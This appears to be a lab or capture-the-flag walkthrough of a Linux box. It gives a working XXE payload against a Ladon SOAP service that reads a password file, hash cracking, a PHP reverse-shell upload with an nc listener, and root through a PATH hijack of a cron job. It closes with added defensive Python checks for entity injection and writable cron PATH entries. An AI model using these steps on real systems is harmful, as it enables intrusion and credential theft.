Key takeaways
- Exploiting CVE-2019-1010268
- Location of the Apache configuration file
- Linux PATH precedence: Linux searches the directories in PATH from left to right and runs the first executable it finds, so a writable directory early in PATH can be used to shadow a command and escalate privileges
Detailed steps
Run an nmap scan; many ports are open, but the only useful one is 8888
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-29 20:15 EDT
Warning: 192.168.189.161 giving up on port because retransmission cap hit (10).
Nmap scan report for muddy.ugc (192.168.189.161)
Host is up (0.11s latency).
Not shown: 65503 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
25/tcp open smtp Exim smtpd 4.92
| smtp-commands: muddy Hello muddy.ugc [192.168.45.157], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.7
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Muddy | Found some mud? Call us! – A muddy WordPress!
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
8888/tcp open http WSGIServer 0.1 (Python 2.7.16)
|_http-title: Ladon Service Catalog
Running dirsearch against port 80 reveals a webdav directory
# Dirsearch started Sun Oct 6 06:59:19 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u 192.168.116.161 -w /usr/share/wordlists/dirb/big.txt
301 323B http://192.168.116.161/javascript -> REDIRECTS TO: http://192.168.116.161/javascript/
403 280B http://192.168.116.161/server-status
401 462B http://192.168.116.161/webdav
301 321B http://192.168.116.161/wp-admin -> REDIRECTS TO: http://192.168.116.161/wp-admin/
301 323B http://192.168.116.161/wp-content -> REDIRECTS TO: http://192.168.116.161/wp-content/
301 324B http://192.168.116.161/wp-includes -> REDIRECTS TO: http://192.168.116.161/wp-includes/
Visiting port 8888 shows that the Ladon framework is enabled; searching for it turns up "Ladon Framework for Python 0.9.40 - XML External Entity Expansion - XML webapps Exploit"
In essence this amounts to local file inclusion (reading arbitrary files via XXE). Research shows the Apache configuration file lives at /etc/apache2/sites-available/000-default.config, and it reveals where the webdav password file is stored
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
<Directory "/var/www/html/webdav">
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /var/www/html/webdav/passwd.dav
DAV On
Require valid-user
</Directory>
</VirtualHost>
Following the PoC, call the service from Postman to retrieve the webdav password file
curl --location '192.168.116.161:8888/muddy/soap11' \
--header 'Content-Type: text/xml; charset=utf-8' \
--header 'SOAPAction: http://192.168.116.161:8888/muddy/soap11/checkout' \
--data '<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE uid
[<!ENTITY passwd SYSTEM "file:///var/www/html/webdav/passwd.dav">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<checkout>
<uid>&passwd;</uid>
</checkout>
</soap:Body>
</soap:Envelope>
'
Response
<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="urn:muddy" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<ns:checkoutResponse>
<result>Serial number: administrant:$apr1$GUG1OnCu$uiSLaAQojCm14lPMwISDi0</result>
</ns:checkoutResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
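As an added defensive illustration, not Ladon's own code, the following Python 3 gate rejects any SOAP body that declares DTD entities before the service parses it. The two request bodies are constructed from the request shown above and a benign equivalent; the checkout and uid element names are taken from the page.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed request bodies: the XXE payload from the walkthrough, and a benign checkout.
XXE_BODY = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE uid [<!ENTITY passwd SYSTEM "file:///var/www/html/webdav/passwd.dav">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><checkout><uid>&passwd;</uid></checkout></soap:Body></soap:Envelope>"""

BENIGN_BODY = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><checkout><uid>42</uid></checkout></soap:Body></soap:Envelope>"""


class UnsafeXML(ValueError):
    """Raised when a request body carries a DTD entity declaration or external reference."""


def reject_entities(data):
    """Parse once with expat and abort on any entity declaration or external entity reference."""
    parser = expat.ParserCreate()

    def on_entity_decl(name, *rest):
        raise UnsafeXML("entity declaration in request body: %r" % name)

    def on_external_ref(*args):
        raise UnsafeXML("external entity reference in request body")

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(data, True)


def checkout_uid(body):
    """Return the <uid> text of a checkout request, or None when the body is rejected."""
    try:
        reject_entities(body)
    except UnsafeXML:
        return None
    root = ET.fromstring(body)
    uid = root.find(".//uid")
    return uid.text if uid is not None else None
```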
Crack the hash locally with john
C:\home\kali\Documents\OFFSEC\WarmUp\Muddy> john webdav_passwd --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sleepless (?)
1g 0:00:00:00 DONE (2024-10-06 06:48) 1.818g/s 127418p/s 127418c/s 127418C/s softball30..ramarama
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Enabling a WebDAV extension in Firefox lets us upload files directly. Here we edit /usr/share/webshells/php/php-reverse-shell.php and upload it; after starting nc -nlvp 1234 locally, visiting http://192.168.116.161/webdav/php-reverse-shell.php gives us a reverse shell
Upload linpeas.sh and run it: it shows a cron job that calls netstat, and we have write access to /dev/shm
SHELL=/bin/sh
PATH=/dev/shm:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root netstat -tlpn > /root/status && service apache2 status >> /root/status && service mysql status >> /root/status
bash-5.0# ls -la /dev | grep shm
ls -la /dev | grep shm
drwxrwxrwt 2 root root 60 Oct 6 07:24 shm
Because Linux searches PATH from left to right and runs the first match it finds, we can plant our own netstat in /dev/shm to obtain root
www-data@muddy:/home/ian$ cd /dev/shm
cd /dev/shm
www-data@muddy:/dev/shm$ echo "chmod +s /bin/bash" >netstat
echo "chmod +s /bin/bash" >netstat
www-data@muddy:/dev/shm$ ls -l
ls -l
total 4
-rw-rw-rw- 1 www-data www-data 19 Oct 6 07:24 netstat
www-data@muddy:/dev/shm$ chmod +x netstat
chmod +x netstat
www-data@muddy:/dev/shm$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
www-data@muddy:/dev/shm$ /bin/bash -p
/bin/bash -p
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
3c798fbaf8139af5c19c1d314fa139c8
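As an added defender-side example (not from the walkthrough), this Python 3 audit parses an /etc/crontab-style file and flags every bare command name whose PATH lookup reaches a world-writable directory before the directory that actually holds the binary, which is exactly the netstat-in-/dev/shm condition above. The sample crontab is constructed to mirror the one found on the box; the is_writable parameter is a test hook, and by default real directory permissions are checked.

```python
import os
import re
import stat
# Constructed sample that mirrors the root crontab and PATH found on the box.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/dev/shm:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root netstat -tlpn > /root/status && service apache2 status >> /root/status
"""
SHELL_BUILTINS = {"cd", "test", "[", "exit", "export"}  # never resolved through PATH

def parse_system_crontab(text):
    """Return (PATH dirs, [(user, command), ...]) from /etc/crontab-style text."""
    path_dirs, jobs = [], []
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("PATH="):
            path_dirs = line[5:].split(":")
        elif line and not line.startswith("#"):
            fields = line.split(None, 6)  # five schedule fields, user, command
            if len(fields) == 7:
                jobs.append((fields[5], fields[6]))
    return path_dirs, jobs

def unqualified_commands(command):
    """First word of each &&, ||, ; or | segment that is invoked by bare name."""
    names = []
    for segment in re.split(r"&&|\|\||;|\|", command):
        words = segment.replace("(", " ").replace(")", " ").split()
        if words and "/" not in words[0] and "=" not in words[0] and words[0] not in SHELL_BUILTINS:
            names.append(words[0])
    return names

def world_writable(directory):
    """True for directories like drwxrwxrwt /dev/shm that grant write to 'other'."""
    return os.path.isdir(directory) and bool(os.stat(directory).st_mode & stat.S_IWOTH)

def audit(text, is_writable=world_writable):
    """Flag (user, command, dir) when a writable PATH entry is searched before the real binary."""
    findings = []
    path_dirs, jobs = parse_system_crontab(text)
    for user, command in jobs:
        for name in unqualified_commands(command):
            for directory in path_dirs:
                if is_writable(directory):
                    findings.append((user, name, directory))
                    break
                if os.path.exists(os.path.join(directory, name)):
                    break  # the trusted copy wins the lookup; nothing to flag
    return findings
```

The fix the audit points at is either removing /dev/shm from the cron PATH or invoking the tools by absolute path (/bin/netstat, /usr/sbin/service) in the job line.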